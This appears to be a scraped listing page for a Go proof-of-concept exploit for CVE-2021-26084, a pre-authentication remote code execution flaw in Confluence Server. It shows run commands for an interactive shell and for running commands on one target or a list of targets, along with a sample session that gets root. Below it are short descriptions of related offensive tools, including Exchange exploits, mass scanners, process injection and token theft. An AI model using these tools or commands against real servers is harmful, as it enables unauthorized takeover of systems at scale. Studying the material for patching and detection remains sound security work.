CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)

Related tags

CVE-2021-26084
Overview

CVE-2021-26084

Proof of concept for CVE-2021-26084.

Confluence Server Webwork OGNL injection (Pre-Auth RCE)

Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

Command Limiations

Due to the payload, it is not possible to pass some characters. The list below is what I've found during my testing.

  • Double quotations "
  • Vertical bar |

Interactive Shell

 go run exploit.go -t <target> -i

Example

[email protected]:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
[email protected]:/# whoami
root
[email protected]:/# exit
Exiting interactive mode, goodbye
  • Only works on a single target
  • Type exit to exit the interactive shell
  • Notice shows if possible Windows machine

Single Target

go run exploit.go -t <target> -c <command>

Multiple Targets

go run exploit.go -f <file> -c <command>

Build

go mod download
go build exploit.go
Issues
  • Error ./exploit.go:154:15: undefined: io.ReadAll

    Error ./exploit.go:154:15: undefined: io.ReadAll

    Hi I am getting error when trying to execute: command-line-arguments ./exploit.go:154:15: undefined: io.ReadAll

    Any idea what is happening? Tried on 2 different machines with 2 different versions of go installed.

    opened by wiktorw767 0
Owner
Tay
Fullstack developer focusing on Go and Javascript. I sometimes write PHP in shame...
Tay
CVE-2021-3449 OpenSSL denial-of-service exploit 👨🏻‍💻

CVE-2021-3449 OpenSSL <1.1.1k DoS exploit Usage: go run . -host hostname:port This program implements a proof-of-concept exploit of CVE-2021-3449 affe

Richard Patel 212 Sep 22, 2021
Confluence OGNL Injection [CVE-2021-26084].

CVE-2021-26084 this is a script written in golang to exploit Confluence OGNL Injection [CVE-2021-26084]. git clone https://github.com/march0s1as/CVE-

gv1_ 6 Sep 25, 2021
vRealize RCE + Privesc (CVE-2021-21975, CVE-2021-21983, CVE-0DAY-?????)

REALITY_SMASHER vRealize RCE + Privesc (CVE-2021-21975, CVE-2021-21983, CVE-0DAY-?????) "As easy to stop as it is to comprehend." What is it? "Reality

rabid 25 Jul 30, 2021
CVE-2021-26855 exp

CVE-2021-26855 CVE-2021-26855 ssrf 简单利用 golang 练习 影响版本 Exchange Server 2013 小于 CU23 Exchange Server 2016 小于 CU18 Exchange Server 2019 小于 CU7 利用条件 该漏洞不

Justin Ryan 102 Sep 13, 2021
CVE-2021-26855 exp

CVE-2021-26855 CVE-2021-26855 ssrf 简单利用 golang 练习 影响版本 Exchange Server 2013 小于 CU23 Exchange Server 2016 小于 CU18 Exchange Server 2019 小于 CU7 利用条件 该漏洞不

Charlotte Zhang 102 Sep 13, 2021
CVE-2021-21978 exp

CVE-2021-21978 CVE-2021-21978 RCE exp 影响版本 VMware View Planner Harness 4.X 与 CVE-2021-21978 类似,该漏洞可以在未授权访问的情况下,上传任意文件,并通过修改自带 py 脚本实现远程代码执行。

null 20 Apr 17, 2021
Exploitation of CVE-2018-18925 a Remote Code Execution against the Git self hosted tool: Gogs.

CVE-2018-18925 Exploitation of CVE-2018-18925 a Remote Code Execution against the Git self hosted tool: Gogs. Gogs is based on the Macaron framework.

Jakom 5 Sep 17, 2021
kunpeng是一个Golang编写的开源POC框架/库,以动态链接库的形式提供各种语言调用,通过此项目可快速开发漏洞检测类的系统。

Kunpeng 简介 Kunpeng是一个Golang编写的开源POC检测框架,集成了包括数据库、中间件、web组件、cms等等的漏洞POC(查看已收录POC列表),可检测弱口令、SQL注入、XSS、RCE等漏洞类型,以动态链接库的形式提供调用,通过此项目可快速开发漏洞检测类的系统,比攻击者快一步发

OpenSec 1.4k Sep 14, 2021
A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855).

proxylogscan This tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and imperson

dw1 130 Sep 24, 2021
Demo of process injection, using Nt, direct syscall, etc.

?? Frog For Automatic Scan ?? Doge For Defense Evasion&Offensive Security ?? Doge-Process-Injection Demo of process injection, using Nt, direct syscal

TimWhite 14 Sep 16, 2021
Someone tried to unlock your device

PC Auth Notifier Someone tried to unlock your device I made this project because I want to learn flutter by myself, unfortunately I can't use my XPS c

Rubi 55 Sep 9, 2021
MX1014 is a flexible, lightweight and fast port scanner.

MX1014 MX1014 是一个遵循 “短平快” 原则的灵活、轻便和快速端口扫描器 此工具仅限于安全研究和教学,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任! Version 1.1.1 - 版本修改日志 Features 兼容 nmap 的端口和目标语法 支持各

L 23 Sep 16, 2021
null 652 Sep 23, 2021
set of web security test cases and a toolkit to construct new ones

Webseclab Webseclab contains a sample set of web security test cases and a toolkit to construct new ones. It can be used for testing security scanners

Yahoo 918 Sep 16, 2021
Small utility package for stealing tokens from other processes and using them in current threads, or duplicating them and starting other processes

getsystem small utility for impersonating a user in the current thread or starting a new process with a duplicated token. must already be in a high in

Alex Flores 6 Aug 24, 2021
Exploit for HiveNightmare - CVE-2021–36934

HiveNightmare this is a quick and dirty exploit for HiveNightmare (or SeriousSam) - CVE-2021–36934 This allows non administrator users to read the SAM

Christian Mehlmauer 50 Sep 20, 2021
一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc | 使用之前务必先阅读文档

Welcome to xray ?? 一款功能强大的安全评估工具 ✨ Demo ?? 使用文档 ⬇️ 下载地址 注意:xray 不开源,直接下载构建的二进制文件即可,仓库内主要为社区贡献的 poc,每次 xray 发布将自动打包。 ?? 快速使用 在使用之前,请务必阅读并同意 License 文件中

Chaitin Tech 5.8k Sep 24, 2021
Pokes users on Slack about outstanding risks found by Crowdstrike Spotlight or vmware Workspace ONE so they can secure their own endpoint.

?? security-slacker Pokes users on Slack about outstanding risks found by Crowdstrike Spotlight or vmware Workspace ONE so they can secure their own e

Niels Hofmans 13 Sep 3, 2021
Shellcode implementation of Reflective DLL Injection by Golang. Convert DLLs to position independent shellcode

?? Frog For Automatic Scan ?? Doge For Defense Evasion&Offensive Security Doge-sRDI Shellcode implementation of Reflective DLL Injection by Golang. Co

TimWhite 29 Sep 21, 2021